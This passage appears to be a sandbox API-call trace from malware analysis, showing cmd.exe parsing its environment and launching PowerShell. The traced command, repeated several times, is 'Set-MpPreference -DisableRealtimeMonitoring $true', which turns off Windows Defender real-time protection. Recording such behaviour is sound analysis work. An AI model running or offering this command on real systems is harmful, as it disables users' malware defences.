hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45e8cc | out: phkResult=0x45e8cc*=0x68) returned 0x0 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x40, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x1, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x1, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x0, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x9, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x4, lpData=0x45e8d8*=0x9, lpcbData=0x45e8d0*=0x4) returned 0x0 [0120.334] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45e8d4, lpData=0x45e8d8, lpcbData=0x45e8d0*=0x1000 | out: lpType=0x45e8d4*=0x0, lpData=0x45e8d8*=0x9, lpcbData=0x45e8d0*=0x1000) returned 0x2 [0120.334] RegCloseKey (hKey=0x68) returned 0x0 [0120.334] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a260 [0120.334] srand (_Seed=0x5c09a260) [0120.334] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0120.334] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0120.334] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.334] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e47f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.334] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.334] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.334] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.334] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.334] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.335] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.335] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.335] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.335] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.335] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.335] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.335] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.335] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.335] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45f698 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x45f698, lpFilePart=0x45f694 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x45f694*="system32") returned 0x13 [0120.335] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.335] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x45f414 | out: lpFindFileData=0x45f414) returned 0x4e4a00 [0120.335] FindClose (in: hFindFile=0x4e4a00 | out: hFindFile=0x4e4a00) returned 1 [0120.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x45f414 | out: lpFindFileData=0x45f414) returned 0x4e2b88 [0120.335] FindClose (in: hFindFile=0x4e2b88 | out: hFindFile=0x4e2b88) returned 1 [0120.335] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.335] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0120.335] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0120.335] GetEnvironmentStringsW () returned 0x4e2b88* [0120.336] FreeEnvironmentStringsW (penv=0x4e2b88) returned 1 [0120.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.336] GetConsoleOutputCP () returned 0x1b5 [0120.336] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.336] GetUserDefaultLCID () returned 0x409 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x45f7d8, cchData=128 | out: lpLCData="0") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x45f7d8, cchData=128 | out: lpLCData="0") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x45f7d8, cchData=128 | out: lpLCData="1") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0120.337] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0120.337] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.338] GetConsoleTitleW (in: lpConsoleTitle=0x4e2c18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.338] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0120.338] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0120.338] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0120.340] _wcsicmp (_String1="powershell", _String2=")") returned 71 [0120.340] _wcsicmp (_String1="FOR", _String2="powershell") returned -10 [0120.340] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10 [0120.340] _wcsicmp (_String1="IF", _String2="powershell") returned -7 [0120.340] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7 [0120.340] _wcsicmp (_String1="REM", _String2="powershell") returned 2 [0120.340] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2 [0120.341] GetConsoleTitleW (in: lpConsoleTitle=0x45f4d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.342] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0120.342] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0120.342] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0120.342] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0120.342] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0120.342] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0120.342] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0120.342] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0120.342] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0120.342] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0120.342] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0120.342] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0120.342] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0120.342] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0120.342] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0120.342] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0120.342] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0120.342] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0120.342] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0120.342] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0120.342] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0120.342] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0120.342] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0120.342] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0120.342] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0120.342] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0120.342] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0120.342] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0120.342] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0120.342] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0120.342] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0120.343] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0120.343] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0120.343] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0120.343] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0120.343] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0120.343] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0120.343] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0120.343] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0120.343] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0120.343] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0120.343] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0120.343] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0120.343] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0120.343] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0120.343] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0120.343] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0120.343] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0120.343] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0120.343] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0120.343] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0120.343] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0120.343] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0120.343] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0120.343] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0120.343] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0120.343] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0120.343] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0120.343] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0120.343] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0120.343] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0120.343] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0120.343] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0120.343] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0120.343] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0120.343] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0120.343] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0120.344] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0120.344] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0120.344] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0120.344] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0120.344] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0120.344] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0120.344] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0120.344] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0120.344] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0120.344] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0120.344] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0120.344] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0120.344] _wcsicmp (_String1="powershell", _String2="FOR") returned 10 [0120.344] _wcsicmp (_String1="powershell", _String2="IF") returned 7 [0120.344] _wcsicmp (_String1="powershell", _String2="REM") returned -2 [0120.344] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13 [0120.345] SetErrorMode (uMode=0x0) returned 0x0 [0120.345] SetErrorMode (uMode=0x1) returned 0x0 [0120.345] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e31b8, lpFilePart=0x45eff0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x45eff0*="system32") returned 0x13 [0120.345] SetErrorMode (uMode=0x0) returned 0x1 [0120.346] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.346] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.352] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.354] GetLastError () returned 0x2 [0120.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.354] GetLastError () returned 0x2 [0120.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.354] GetLastError () returned 0x2 [0120.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.354] GetLastError () returned 0x2 [0120.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.354] GetLastError () returned 0x2 [0120.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.355] GetLastError () returned 0x2 [0120.355] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.356] GetLastError () returned 0x2 [0120.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.357] GetLastError () returned 0x2 [0120.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.357] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0x4e3548 [0120.357] FindClose (in: hFindFile=0x4e3548 | out: hFindFile=0x4e3548) returned 1 [0120.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0xffffffff [0120.359] GetLastError () returned 0x2 [0120.359] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x45ed6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ed6c) returned 0x4e3548 [0120.360] FindClose (in: hFindFile=0x4e3548 | out: hFindFile=0x4e3548) returned 1 [0120.361] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.361] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.361] GetConsoleTitleW (in: lpConsoleTitle=0x45f264, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.361] InitializeProcThreadAttributeList (in: lpAttributeList=0x45f0ec, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45f1b4 | out: lpAttributeList=0x45f0ec, lpSize=0x45f1b4) returned 1 [0120.361] UpdateProcThreadAttribute (in: lpAttributeList=0x45f0ec, dwFlags=0x0, Attribute=0x60001, lpValue=0x45f1ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45f0ec, lpPreviousValue=0x0) returned 1 [0120.361] GetStartupInfoW (in: lpStartupInfo=0x45f0a8 | out: lpStartupInfo=0x45f0a8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.361] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="WecVers", _MaxCount=0x7) returned -20 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.362] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0120.362] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.363] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x45f148*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x45f194 | out: lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x45f194*(hProcess=0x78, hThread=0x74, dwProcessId=0x5a8, dwThreadId=0x358)) returned 1 [0120.667] CloseHandle (hObject=0x74) returned 1 [0120.667] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.667] GetEnvironmentStringsW () returned 0x4e4a00* [0120.667] FreeEnvironmentStringsW (penv=0x4e4a00) returned 1 [0120.667] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0161.612] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x45f088 | out: lpExitCode=0x45f088*=0x1) returned 1 [0161.612] CloseHandle (hObject=0x78) returned 1 [0161.612] _vsnwprintf (in: _Buffer=0x45f1d0, _BufferCount=0x13, _Format="%08X", _ArgList=0x45f094 | out: _Buffer="00000001") returned 8 [0161.612] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0161.612] GetEnvironmentStringsW () returned 0x4e7840* [0161.612] FreeEnvironmentStringsW (penv=0x4e7840) returned 1 [0161.612] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0161.612] GetEnvironmentStringsW () returned 0x4e7840* [0161.613] FreeEnvironmentStringsW (penv=0x4e7840) returned 1 [0161.613] DeleteProcThreadAttributeList (in: lpAttributeList=0x45f0ec | out: lpAttributeList=0x45f0ec) [0161.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.613] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.613] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.613] GetConsoleMode (in: 